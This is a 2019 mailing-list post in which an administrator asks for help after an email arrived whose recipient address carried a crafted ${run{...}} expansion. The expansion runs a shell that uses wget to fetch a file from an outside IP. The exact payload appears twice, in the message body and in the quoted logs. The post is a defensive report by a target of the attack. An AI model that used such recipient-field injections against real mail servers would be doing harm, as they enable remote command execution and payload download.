[Mimedefang] Carefully Crafted Recipient executes script?

Stefan Schoeman stefan at internext.co.za
Tue Jun 25 16:25:38 EDT 2019 

Hoping someone can assist me with this...

I just came across an email processed by MIMEDefang that seems to have 
had a specially crafted recipient. It seems as if the crafted recipient 
managed to coerce either my mimedefang-filter, or MIMEDefang itself to 
actually execute script. The recipient was recorded as :

<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2065.181.120.163\x2fstfinracu\x22}}@server>

which looks as if it tried to execute /bin/sh -c "wget 
65.181.120.163/stfinracu", with at least some partial success, because 
the .INPUTMSG file  resulted in:

Received: 1
Received: 2
Received: 3
...
...
Received: 31

A Spamassasin scan of this file, then yielded:

1.2 MISSING_HEADERS        Missing To: header
1.8 MISSING_SUBJECT        Missing Subject: header
2.3 EMPTY_MESSAGE          Message appears to have no textual parts and 
no Subject: text
1.0 MISSING_FROM           Missing From: header
0.0 MSGID_FROM_MTA_HEADER  Message-Id was added by a relay
1.4 MISSING_DATE           Missing Date: header

which seems to indicate that this lot happened before SpamAssassin ran 
in filter_end

My logfile indicated the following:

Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: from=<root at 208.com>, 
size=395, class=0, nrcpts=1, msgid=<201906251921.x5PJLcKV004747 at --->, 
proto=SMTP, daemon=MTA, relay=minecraft.good-gaming.com [34.228.4.69]
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: DEBUG: GeoIP 
lookup of 34.228.4.69 is 'US'
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: DEBUG 
REPLYTO=, SENDER=<root at 208.com>, FROM=
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: SpamAssassin 
Result : 7.715
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: Mail Subject : 
x5PJLcKV004747 :  : 2 : 7.715 : 0.85136 : <root at 208.com> : 
<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2065.181.120.163\x2fstfinracu\x22}}@server> 
: 34.228.4.69 : 395
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: filter: discard=1
Jun 25 21:21:41 smtp mimedefang[17340]: x5PJLcKV004747: Discarding 
because filter instructed us to
Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: Milter: data, discard
Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: discarded

I would very much like to hear the community's opinion on this and how I 
can protect against this?

Thanks in advance!
Stefan

More information about the MIMEDefang mailing list